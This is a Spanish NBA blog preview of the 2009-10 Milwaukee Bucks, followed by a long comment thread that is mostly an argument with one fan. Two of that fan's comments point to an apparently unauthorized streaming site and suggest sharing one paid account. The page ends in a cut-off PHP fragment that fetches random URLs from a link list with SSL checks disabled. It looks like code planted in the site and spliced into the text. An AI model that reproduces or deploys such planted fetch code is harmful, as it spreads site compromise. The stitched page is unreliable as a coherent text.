Milwaukee Bucks: Asumiendo la derrota

06 de October de 2009 por txusma

A principios de enero de este mismo año, los Bucks eran equipo de Playoffs con un balance de 18 victorias y 21 derrotas. Michael Redd ejercía de anotador compulsivo, Andrew Bogut convertía su zona en territorio vedado a pívots rivales, Richard Jefferson y Charlie Villanueva actuaban como perfectos escuderos e incluso Luke Ridnour parecía recuperar parte del brillo perdido. Cuando acabó enero Redd y Bogut se habían lesionado para el resto de la temporada y el sueño había quedado reducido a pedazos. Los meses que siguieron hasta la confirmación de la no presencia en Playoffs no fueron más que un quiero y no puedo. Una vez más el proyecto de los Bucks acababa en fracaso.

El verano, como ya lo fue el anterior, ha sido movidito en las oficinas de Milwaukee. Jefferson y Villanueva, sus 2 mejores anotadores la pasada temporada en términos absolutos, no continúan en la franquicia así como un Ramon Sessions capaz de anotar 44 puntos y repartir 12 asistencias en un partido frente Detroit y de acabar con un triple doble otro frente a los Lakers. Mucha tela ha abandonado el equipo y en cambio se han quedado los 2 jugadores llamados en su momento a liderar el proyecto pero que el año pasado se perdieron más partidos de los jugados. Efectivamente Michael Redd y Andrew Bogut son, una vez más y hasta que se demuestre lo contrario, las puntas de lanza de este equipo.Comentábamos en nuestro análisis del año pasado que Redd se enfrentaba a la última oportunidad de reivindicarse como jugador franquicia. Comenzó el año como acabó el anterior: bajandos sus registros en puntos, rebotes y asistencias y la lesión fue la puntilla a una temporada que tampoco iba camino de ser increíble. Le quedan 2 años de contrato de los cuales el segundo depende de su elección. No nos extrañe que a pesar de realizar una buena temporada le veamos involucrado en rumores de traspaso e incluso que acbe siendo traspasado definitivamente. A sus 30 años, el tiempo de Michael Redd en los Bucks, todo un clásico, parece tocar a su fin.

Andrew Bogut en cambio tiene mucho más margen de confianza que su compañero. Su temporada hasta el momento de la lesión estaba siendo buena y en Milwaukee creen que podrán contar con él en años venideros. Posiblemente no será una gran estrella de la liga pero es un pívot muy activo en ambos lado de la cancha y candidato a jugar algún All-Stars antes de que se retire.

Recordemos que Scott Skiles es el actual entrenador de este equipo y por ello lo más lógico parece pensar en un quinteto titular rocoso, fuerte y eminentemente defensivo. Con Redd y Bogut poniendo la magia, parece claro que Mbah-a-Moute pondrá el músculo. El camerunés, auténtica sorpresa del año pasado y muy del gusto del entrenador, parece que mantendrá el puesto de titular que ya conquistó la temporada pasada y alternará las posiciones de 3-4 según las circunstancias del partido. Por su parte, Luke Ridnour volverá a comenzar la temporada de titular y nuevamente deberá vigilar muy mucho a su teórico reserva. Si el año pasado Ramon Sessions ya le comió la tostada en más de una ocasión no sería de extrañar que el rookie Brandon Jennings, poco a poco, le fuera robando minutos. Eso sí, no se ha encontrado Jennings con el mejor entrenador para llevar a cabo su juego. Deberá mejorar mucho en defensa y controlar mejor el juego. Si madura conforme va pasando la temporada, ganará protagonismo.

El último hueco del quinteto tiene muchos pretendientes, todos recién llegados. Ersan Ilyasova, Hakim Warrick y Carlos Delfino trabajan para salir de inicio en los partidos y los 3 son opciones más que interesantes. Ilyasova ya ha demostrado en el Barça que ha mejorado mucho desde que abandonó la NBA hace 2 años, Warrick ha cujado grandes actuaciones en los Grizzlies cuando ha disfrutado de minutos y Delfino dejó muestras de clase en Toronto hace un año. Cual de los 3 sale con ventaja es complicado de decir. El que está claro que no será titular será el rookie del año pasado, Joe Alexander, que tiene todos los números para convertirse en el gran bluff de la genial camada de rookies de 2008. De todas maneras en los Bucks, aún le darán otro añito más de margen. De su mejora puede depender el futuro de la franquicia a largo plazo.

Completan la plantilla Charlie Bell, interesantísima opción desde el banquillo, Roko Leno Ukic, a priori tercer base pero al quite por si salta alguno de los otros 2 y Kurt Thomas y Dan Gadzuric, recambios destinados a aportar algo de descanso a Bogut.

Mirándolo con perspectiva, este es posiblemente el peor quinteto inicial que presentan los Bucks desde hace 3 o 4 temporadas y aunque disponen de un banquillo no exento de calidad, sobretodo en las posiciones exteriores, no parece que vaya a ser suficiente para luchar por entrar en Playoffs. A parte de Redd no está claro quien asumirá el protagonismo anotador en el equipo (Bogut? Jennings? Warrick?) y a simple vista ya se puede comprobar que si Bogut cae lesionado el juego interior sería complemente patético. Al menos este año no pagan impuesto de lujo. Total, para obtener siempre el mismo resultado.

Quinteto: Luke Ridnour, Michael Redd, Richard Mbah-a-Moute, Ersan Ilyasova, Andrew Bogut
6º hombre: Hakim Warrick

Pronóstico: Muy fuera de Playoffs.

Comenta

77 comentarios a esta entrada

  1. Love Denise dice:
    #1

    lemontus, eres libre para decir lo que quieras, incluidas cosas como las de Warrick o Delfino (que ni tu te las crees), pero sin tanta chulería o prepotencia hacia quienes no comparten tus opiniones. Como ejemplo, a mí se me echó medio blog encima por mis comentarios sobre S.Rodriguez y Iverson, pero creo que no ha habido ningún tipo de desconsideración, chulería, o insulto por ninguna parte, simplemente hemos debatido poniendo cada parte nuestros argumentos encima de la mesa y respetando las opiniones contrarias a tu posición, que para eso pienso que existe este blog, para debatir, pero con un minimo de educación. Si todos pensaramos igual, sería un rollo…., y no existirían los espacios para opinar
    Coincido con sayim, llevo en octubre conocí el blog, y decidí leer y participar porque ví un buen ambiente, una buena información por parte de los que escriben los artículos y respeto entre los comentarios de uno y otro.
    Ya sabes, por mi parte puedes escribir todos los días sobre lo bueno que son los Bucks pero sin ir por encima de nadie

      Citar

  2. LEmontus dice:
    #2

    Que warrick ofensivamente es muy bueno , que ridnour es de los mejores(el 4 seguramente y el primero por numeros) bases suplentes de la liga(a mi no me gusta pero es así)despues de haberlo demostrado diciendo cada base suplente de cada equipo(creo que el problema radica en el desconocimiento de los jugadores que he dado, esto lo digo sin animo de ofender pero soy el unico que habla contrastando y creo que el unico que sabe los bases suplentes de todos los equipos) y que bogut es el segundo mejor pivot de la NBA(no de la historia, para mi el primero reitero.) son cosas para nada disparatadas que cualquier persona que entienda minimamente de baloncesto entenderia y no se reiria de ellas, pero bueno solo hace falta lo de siempre tiempo, en un mesecito volvere a pasarme por aqui. Lo de que aprovecho el anonimato es una tonteria si quieres agregame al msn y te digo donde vivo. Salvando los oportunismos por supuesto mirarse el partido de warrick de hoy(aunque ha muchos os resulte rarro ver un partido de nba entero, SIN ANIMO DE OFENDER, pero es lo que pienso y no soporto gente que hable sin ver partidos simplemente ciñiendose a los numeros.

      Citar

  3. LEmontus dice:
    #3

    Si he ofendido a alguien pido disculpas pero creo que en ningun momento os he faltado al respeto. Si lo he hecho pido perdón.

      Citar

  4. LEmontus dice:
    #4

    En cuanto a los de los bases collinson es titular y cuenta con muchos minutos como tal, Tj ford ha estado apartado del equipo por que su juego no hace bien a pacers y no tiene minutos en la mayoria de partidos( Se te perdona este fallo), calderon vuelve a ser titular en el proximo partido(pero no pasa nada tambien se perdona este fallo) aunque no he dado a ninguno como titular , ahora viene lo mas gracioso cj watson base? esto es nuevo pero si es escolta(Tampoco pasa nada) y por ultimo el caso delonte west… Este no es suplente este esta chalao si se decicara a jugar cavs tenia el anillo 97% de posibiladaes, para mi delonte es una estella(cuando no ha estado lebron ha sido el que ha tirado del carro con buenas actuaciones y numerazos) y por cierto a delonte bucks aha tenido que sufrirlo en dos paridos que le dio por jugar.

    En este comentario puede que te haya ofendido a razon de que ironizas con frases como “Eres un experto“ INTENTANDO corregirme y encima equivocandote tú.

    De ese comentario me quedo con la faceta de Cj watson de base y que noah esta ahi ahi con bogut, para mi noah es otro pedazo de pivot que no quepa duda.

      Citar

  5. LEmontus dice:
    #5

    Amm en cuanto a lo de ridnour y session no he entendido bien lo que has querido decir pero si te refieres a la temporada 2008-2009 sí es cierto que session rayo a mejor nivel y aun asi aunque se lo merecia creo que no llego a ser titular(CREO). Pero este año ridnour esta muy bien segurisimo tirando y con una mejora en la faceta de dirigir al equipo. Ademas ha sido importane cuando el titular no ha estado bien que es el papel principal de un suplente. Session que sí es de mi gusto al contrario que ridnour sim embargo no lo esta haciendo bien lo que se debe sobre todo a que Minessota no tiene nada que hacer y no les queda otra que dar experiencia y minutos a flyn.

      Citar

  6. Uno cualquiera dice:
    #6

    A mí lo que me queda claro tras leer los comentarios es que LEmontus es un forofo de los Bucks y su valoración no es objetiva, cosa que me parece razonable.

    Creo que el 99% de personas a las que le preguntes te dirá que ni Bogut es uno de los 2 mejores centers de la liga, ni Delfino uno de los aleros más completos ni Warrick de los mejores ofensivamente ni Ridnour el mejor base suplente.

    Se le está dando demasiadas vueltas a lo mismo cayendo en la descalificación y por momentos me viene a la memoria lo de “Don’t feed the troll”…

      Citar

  7. max dice:
    #7

    Lemontus, hace mucho tiempo que sigo este blog y el nivel de conocimientos de NBA que tienen gente como Txusma, Thedeerhunter, VivaDirk y demás es tan elevado que es inconcebible que los califiques de gente que no conoce el baloncesto, de desconocer a los jugadores de la NBA y de no ver partidos. El blog (para mi el mejor sobre NBA que conozco) tiene un nivel muy alto y solo el hecho de que entres por aquí de vez en cuando justifica un poco tus desacertados comentarios.
    Por otra parte, los datos que ha dado Kantonyo creo que son el mejor reflejo de la situación actual de los Bucks, un buen equipo pero que ha cogido una gran racha a partir de jugar contra un gran numero de equipos del Este sin ninguna motivación y que ya estan esperando el final de temporada.

      Citar

  8. sergio dice:
    #8

    Vaya… unos 20 minutos leyendo los comentarios del articulo en los ultimos dias…

    Desde luego LEmontus creo que tienes un ligerillo problema a la hora de justificar tus preferencias y hacerlas llegar al resto de la gente.. porque creo que si escribes los comentarios, mas que intentar cambiar las opiniones de los demas, lo que intentas es crear un debate que deberia ser tranquilo y exponiendo tus razones….

    A mi Bogut me parece un grandisimo pivot, quizas entre los 5 mejores, pero tambien recuerdo el bajisimo nivel de los pivots en los ultimos años. De hecho en sus primeras temporadas creia que seria otro Milicic o Kwane Brown, pero me alegra que se haya convertido en algo mucho mas que eso.

    Lo de Delfino aun me parece mas injustificable la verdad… Esta muy bien que sea un jugador completo, pero que sea un jugador completo no significa que pueda ayudar a su equipo en determinados apartados a la hora de decidir partidos. Si Bogut estaba entre los 5 primeros, dudo que Delfino este entre los 20.

    Y por favor… se un poquito humilde y piensa que la totalidad de los que comentan a diario en este blog poseen unos grandes conocimientos de baloncesto. Nadie se mete a comentar en un blog a diario ni realiza articulos por “exceso de ocio”. Y que conste que lo digo sin conocer ni siquiera el nombre real ni ningun dato de ninguno de ellos. Si por algo se distingue este blog es por que a pesar de que las opiniones de cada uno distan mucho entre si, intentamos que todo acabe derivando en un mayor conocimiento de la liga y el juego para todos… y eso es algo que puedes comprobar si te pasas mas a menudo y dejas a un lado los forofismos amigo

      Citar

  9. Kiki dice:
    #9

    LEmontus, eres un libro abierto. No dejes de escribir. Eres uno de los dos que más saben de esto, como mínimo…

      Citar

  10. LEmontus dice:
    #10

    Bajarse el partido Bucks_denver (dudo que lo esteis viendo) ya que bogut se ha cargado defaltas rapido y jennigs no ha tirado mucho para ver a bucks como equipo. Mirad como defienden y sobre todo fijarse en Mbah Moute a partir de hoy la peor pesadilla e Carmelo, El partido no ha termindo y melo puede liarla en dos minutos pero la defensa del camerunes increible.

      Citar

  11. sergi237 dice:
    #11

    donde ves los partidos?

      Citar

  12. Txusma dice:
    #12

    La verdad es que Milwaukee está a buen nivel. La adquisición de Salmons les ha salido perfectas…

    Lemontus, pasate también por otros post para comentar. Como ves el tema del anillo?

      Citar

  13. Love Denise dice:
    #13

    hoy sí ha sido un buen partido de Bucks y de tu apreciado Delfino, pero de ahí a considerarlo el alero más completo del campeonato……
    Por cierto, el otro día jugaron contra los Clippers, e hicieron parecer buenos a los angelinos, puestos a comentar los partidos de los Bucks, hablémos de ellos tanto cuando ganan como cuando pierden.

      Citar

  14. LEmontus dice:
    #14

    Sergi yo veo todos los partidos gracias al pass broadland no se si sabreis lo que es pero lo explico:
    Es una iniciativa de nba que por 60 euros ves todos los partidos de la liga regular en una buenisima calidad desde el ordenador. Estos puedes verlos en directo o en diferido 24 horas despues del partido. Esto te ahorra las noches en vela que todos pasamos jajaja ya que si un partido es a 4 30 a las 10 de la mañana ya puedes verlo y si no te enteras del resultado(es lo que hago yo) puedes verlo perfectamente y con la opcion de pasar los anuncios y tiempos muertos. Solo tiene un problema que los partidos que de el plus(suele ser uno o dos) no puedes verlos. Esto pasó ayer con el Denver-Bucks y por eso tuve que querdarme hatsta tarde para verlo, cuando ocurre esto yo los veo por aqui http://atdhe.net/ . Esta pagina es buenisima vienen todos los partidos aunque la calidad de imagen no es buena y en mas de un partido se para y aveces no puede verse aunque eso pasa muy pocas veces.

      Citar

  15. LEmontus dice:
    #15

    Mi consejo son tres:
    -Ya no vayas a comprartelo porque no te merece la pena para 14 partidos que quedan.
    -Compratelo con un amigo compartido y ponerse de acuerdo para no coincidir los dos al mismo tiempo metidos en el pass(Es lo que yo hago aunque tranquilo que nosotros hemos coincidio varias veces y no nos ha pasado nada xD) De esta manera solo pagas 30 euros.
    -Lo mejor de esto es que puedes verlo en diferido 5 horas despues de terminar el partido, vamos la única pega es que tienes que hacer el sacrificio de no enterarte del resultado pero no veas el gusto que da levantarte por la mañana un sabado y ponerte a ver partidos de nba o despues de la universidad.

      Citar

  16. LEmontus dice:
    #16

    En cuanto a lo deportivo xD:
    Love denise
    A los clippers no los hicieron buenos simplemente jugaron bien los buenos(kaman y godden y de froma intermitente Baron) esos jugadores son de primer nivel e inspirados son dificiles de parar, pero bueno tampoco hay que ser exagerado en el tercer cuarto jennings se puso serio y el solito remonto 12 puntos y puso en +2 a bucks al terminar el cuarto. En el ultimo cuarto bucks no estuvo bien jennings no tiró o mas bien no le dejaronel acierto y la clave del partido a cargo de Neil Olshey(dunleavy menos mal que te fuiste xD) tambien se notó la baja de carlos ya que en su lugar jugó bell 1-6 en tiros y todo lo que conlleva(peores defensas, menos rebotes …) pero no hay más que hablar clipper lo hizo bien y supo anular a jennings(otro punto para Neil Olshey que no intentó pararlo con baron davis si no con ayudas constantes de travis y butler ya que solo con davis no podria haberle parado).

      Citar

  17. LEmontus dice:
    #17

    Txusma donde hay que meterse para comentar sobre ese tema ?

    Ahora unos apuntes ;
    -El partidazo de hoy de delfino obviamente no quiere decir nada pero sus ùltimos 20-25 partidazos SÍ. Imagino que muchos de aqui os lanzasteis a mi cuello por decir que delfino es uno de los aleros mas completos de la nba por sus numeros mediocres. Pero que no os engañen sus primeros partidos fueron muy malos sobre todo en anotación, perdidas, y % tanto que llegó a perder minutos en la rotación(creo que fueron 3 o 4 partidos en blanco). Esto es normal llegar a la nba a un equipo totalmente en construcción tienes esos riesgos. Luego con el equipo ya compactado y con las ideas claras(grande scott skiles) delfino volvió y empezó a rayar a su nivel real y juraría que desde que volvió en sus ultimos 20 25 paridos promedia alrededor de 15-6-3 con un 50% o más en tiros de tres.Esto para un jugador que es 4 opcion en ataque en su equipo es mas que postivo. Puede ser que me esté equivocando en ese promedio hablo de memoria pero no creo que esté lejos. Dicho esto la temporada que viene a buen seguro que Carlos si promediará 16-6-3 con un buenisimo porcentaje de 3.
    -El que dijo que bucks era un equipo malo que se ha aprovechado de unos partidos seguidos contra equipos del este(no creais que hay una diferencia abismal entre conferencias) en su gira por el oeste contra equpios como utah o denver a sacado un 5-1 positivo(cosa que ya comente por aqui que el balance de bucks en el oeste se equiibraría).
    -El que dijo que del quinteto titular de bucks excepto bogut ni uno seria titular en ningun otro equipo aparte de que se equivoca que vea el partido del que es a priori el peor de ese quinteto titular Mbah contra denver(o cavs toronto….) y mire luego los numeros y % de sus estrellas(melo james bosh…).

      Citar

  18. kantonyo dice:
    #18

    He entrado sin saber el resultado de Mil-Den y al ver que habia comentado LeMontus, me he dicho: Milwaukee ha ganado.

    LeMontus no quiero entrar al trapo pero de tantas veces repetirlo va a parecer que dices la verdad, no eres el único que ve partidos de la NBA, y tambien muchos lo vemos a traves de ILP o de otras webs “gratuitas”.

    Te eché de menos en la derrota contra Clippers.

    Por cierto para nada pienso que Milwaukee no lo esté haciendo bien, lo que no comparto es tu forma de analizarlo.

      Citar

  19. LEmontus dice:
    #19

    Tambien me hechaste de menos en la victoria contra sacramento,pero claro eso no lo dices no?.Y tío si he dicho lo de como veo los partidos es porque me lo han preguntado no para insinuar que soi el único que ve partidos.

      Citar

  20. LEmontus dice:
    #20

    Como siempre…. Haber Kantonyo……. El comentario respecto a dever nuggets lo hice cuando el partido de bucks no habia terminado(quedaban tres minutos y ganaban de poco) eso para empezar. He dicho como veo los partidos porque me lo han preguntado no para insinuar que soi el único que ve partidos(aunque lo piense) y para informar al que me lo ha preguntado. Por último no me gustan los oportunismos y menos en la nba(que cualquier jugador puede salirse un dìa) y al igual qe no comente en la derrota ante clippers,tampoco lo hice contra sacramento y tampoco contra denver, simplemente hice un comentario con el partido sin acabar para que vierais a bucks como equipo. entiendo que no te guste mi forma de analizar pero no intentes atacarme si fundamentos porque lo unico que cosigues es evidenciarte.

      Citar

  21. Txusma dice:
    #21

    Lemontus, puedes comentar cualquier cronica para analizar como ha ido el día… Y si algun día quieres escribir algun artículo no dudes en proponerlo (mail a la dirección de contacto y lo hablamos). El blog es colaborativo y aquí tiene espacio todo aquel que respete al resto de participantes.

      Citar

  22. kantonyo dice:
    #22

    Si todo el mundo tiene espacio mientras respete, creo que no es el caso de LEMontus, en dos años que sigo el blog es la primera vez que veo a alguien faltar el respeto de esa manera. Y sólo porque Milwaukee está rompiendo los pronósticos …

      Citar

  23. Dantley2 dice:
    #23

    Me había perdido la discusión, aunque no sé si merece la pena opinar X, si la respuesta tipo es “si dices X, es que no has visto los partidos, mientras que yo sí los he visto y sé más que tú de esto”

    LEmontus, has visto todos los partidos de todos los equipos? Has visto al menos un 25% de los partidos de todos los equipos? Si la respuesta es no, en tu forma de pensar, invalida eso cualquier opinión.

    Así que me voy a limitar a darle la razón en algunos puntos que desde mi punto de vista sí que la tiene:

    – Bogut este año sí está entre los 5 mejores centers de la liga. Depende de la consideración que se le de a los que son 4 a veces, 5 a veces. En los partidos en los que le he visto (menos del 5%, o sea, que le he visto 2 y con equipos de abajo) imponía.

    – Milwaukee ha sorprendido a casi todos. A mí en concreto Jennings me parecía el candidato nº 2 a bust del año. Patinazo. Aún así, si rehiciéramos el draft a día de hoy, probablemente lo elegiría el 4.

    Eso sí, Oklahoma tiene bastante más argumentos que Milwaukee. La diferencia es la conferencia. Y los veo por debajo de Memphis (a quiénes personalmente los daba muy abajo), y Houston.

      Citar

  24. PIRATA dice:
    #24

    Humildemente creo que hemos caído todos en la provocación de LEMontus, cuando este articulo tiene 72 comentarios y la última crónica 2; además de conseguir convertir mi simpatía por Bukcs con tirria…
    Creo que tendriamos de volver todos a lo nuestro, en mi caso disfrutar de vuestros articulos y en el vuestro de seguir haciendo los mejores análisis sobre la NBA……

      Citar

  25. Dantley2 dice:
    #25

    Más razón que un santo con razón, Pirata

      Citar

  26. LEmontus dice:
    #26

    Espero que eso de que bucks es inferior a memphis y houston se una broma.

      Citar

  27. LEmontus dice:
    #27

    okalhoma si es superior aunque claro una serie contra oklahoma seria dificil pronosticar el ganador en temporada regular van 1-1 si no recuerdo mal, y de bucks he visto el 100% de los partidos enteros. En cuanto a lo de jennings si yo fuera general manager hubiera cogido a jennings en 2 lugar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>